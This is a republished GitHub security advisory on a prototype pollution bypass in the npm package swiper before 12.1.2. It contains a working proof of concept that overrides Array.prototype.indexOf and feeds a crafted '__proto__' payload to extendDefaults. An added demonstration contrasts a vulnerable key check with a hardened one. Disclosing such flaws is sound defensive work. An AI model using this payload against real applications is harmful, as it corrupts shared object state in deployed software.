Security Advisories์ถœ์ฒ˜: GitHub Security Advisories์กฐํšŒ์ˆ˜ 9

[swiper] Prototype pollution in swiper

By GitHub
2026๋…„ 2์›” 20์ผ

**Summary**

A prototype pollution vulnerability exists in the npm package swiper (>=6.5.1, <12.1.2). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. The exploit works across Windows and Linux and on Node and Bun runtimes. This issue is fixed in version 12.1.2.

**Details**

The vulnerability resides in line 94 of shared/utils.mjs, where the indexOf() function is used to check whether user-provided input contains forbidden strings.

**PoC**

Steps to reproduce:

1. Install the latest version of swiper using npm install
2. Run the following code snippet:

```js
var swiper = require('swiper');
// The forbidden-key check relies on Array.prototype.indexOf; replacing it
// makes every key look permitted.
Array.prototype.indexOf = () => -1;
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted); // undefined before the call
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred
```

**Expected behavior**

Prototype pollution should be prevented and {} should not gain new properties...
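The check the advisory describes depends on Array.prototype.indexOf, so any code that replaces that method in the same realm defeats it. The following is an added example, not swiper's code and not the content of shared/utils.mjs: a minimal recursive merge with a hypothetical indexOf-based forbidden-key check beside a variant that uses only strict string comparison, plus a runner that replays the advisory's payload and indexOf override against each check and reports whether Object.prototype was polluted. The function names, the forbidden-key list and the merge logic are assumptions made for illustration.

```javascript
// Added example (not swiper's code): forbidden-key check that depends on a
// prototype method, beside one that does not, exercised with the advisory's PoC.

// Hypothetical forbidden-key list, assumed for illustration.
const FORBIDDEN = ['__proto__', 'constructor', 'prototype'];

// Vulnerable check: Array.prototype.indexOf is writable, so earlier code in the
// same realm can replace it and make every key look allowed.
function isForbiddenIndexOf(key) {
  return FORBIDDEN.indexOf(key) >= 0;
}

// Hardened check: strict-equality comparisons only, no prototype method calls.
function isForbiddenStrict(key) {
  return key === '__proto__' || key === 'constructor' || key === 'prototype';
}

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Recursive merge of src into target, skipping keys the supplied check rejects.
// If the check passes "__proto__", target["__proto__"] resolves to
// Object.prototype and the recursion writes into it.
function extend(target, src, isForbidden) {
  for (const key of Object.keys(src)) {
    if (isForbidden(key)) continue;
    const value = src[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      extend(target[key], value, isForbidden);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Replays the advisory's PoC (constructed payload plus the indexOf override)
// against one check and returns true if Object.prototype gained "polluted".
// Restores indexOf and removes the polluted property afterwards.
function runBypass(isForbidden) {
  const payload = '{"__proto__":{"polluted":"yes"}}'; // constructed, from the advisory
  const originalIndexOf = Array.prototype.indexOf;
  Array.prototype.indexOf = () => -1; // the override used by the PoC
  try {
    extend({}, JSON.parse(payload), isForbidden);
    return ({}).polluted === 'yes';
  } finally {
    Array.prototype.indexOf = originalIndexOf;
    delete Object.prototype.polluted;
  }
}

console.log('indexOf check polluted:', runBypass(isForbiddenIndexOf)); // true
console.log('strict check polluted:', runBypass(isForbiddenStrict));   // false
```

The runner shows why the PoC needs the indexOf override: JSON.parse creates an own property literally named `__proto__`, the merge then reads `target["__proto__"]` (which is Object.prototype) and recurses into it, so the only thing standing between the payload and Object.prototype is the key check. A check that never calls a method an attacker can replace keeps working under the same override.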

---

**[devsupporter commentary]**

This article is a recent development update provided by GitHub Security Advisories. To learn more about the related tools or techniques, see the original link.